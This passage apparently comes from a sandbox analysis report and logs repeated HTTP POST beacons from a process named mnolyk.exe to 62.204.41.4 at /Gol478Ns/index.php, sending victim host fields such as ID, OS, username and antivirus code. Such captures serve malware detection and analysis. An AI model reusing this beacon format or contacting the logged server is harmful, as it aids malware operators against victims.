                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      45 | 192.168.2.7 | 49739 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:12.501528978 CET | 149 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:12.565644026 CET | 149 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      450 | 192.168.2.7 | 50145 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:02.533585072 CET | 565 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:02.596209049 CET | 565 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      451 | 192.168.2.7 | 50146 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:02.779772997 CET | 566 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:02.843532085 CET | 566 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      452 | 192.168.2.7 | 50147 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:03.026189089 CET | 567 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:03.088977098 CET | 567 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      453 | 192.168.2.7 | 50148 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:03.260796070 CET | 568 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:03.325751066 CET | 568 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      454 | 192.168.2.7 | 50149 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:03.555506945 CET | 569 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:03.621136904 CET | 569 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      455 | 192.168.2.7 | 50150 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:03.798727989 CET | 570 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:03.862282038 CET | 570 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      456 | 192.168.2.7 | 50151 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:04.039199114 CET | 571 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:04.100732088 CET | 571 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      457 | 192.168.2.7 | 50152 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:04.274600029 CET | 572 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:04.338808060 CET | 572 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      458 | 192.168.2.7 | 50153 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:04.508858919 CET | 573 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:04.573116064 CET | 573 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      459         192.168.2.7  50154        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:04.744163036 CET  574                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:04.807847977 CET  574                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      46          192.168.2.7  49740        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:07:12.735379934 CET  150                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:12.798036098 CET  150                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      460         192.168.2.7  50155        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:04.977917910 CET  575                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:05.042330980 CET  575                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      461         192.168.2.7  50156        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:05.211996078 CET  576                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:05.274806023 CET  576                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      462         192.168.2.7  50157        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:05.447047949 CET  577                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:05.510445118 CET  577                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      463         192.168.2.7  50158        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:05.696445942 CET  578                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:05.761662006 CET  578                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      464         192.168.2.7  50159        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:05.933299065 CET  579                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:05.999583960 CET  579                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      465         192.168.2.7  50160        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:06.194715977 CET  580                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:06.257397890 CET  580                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      466         192.168.2.7  50161        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:06.445123911 CET  581                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
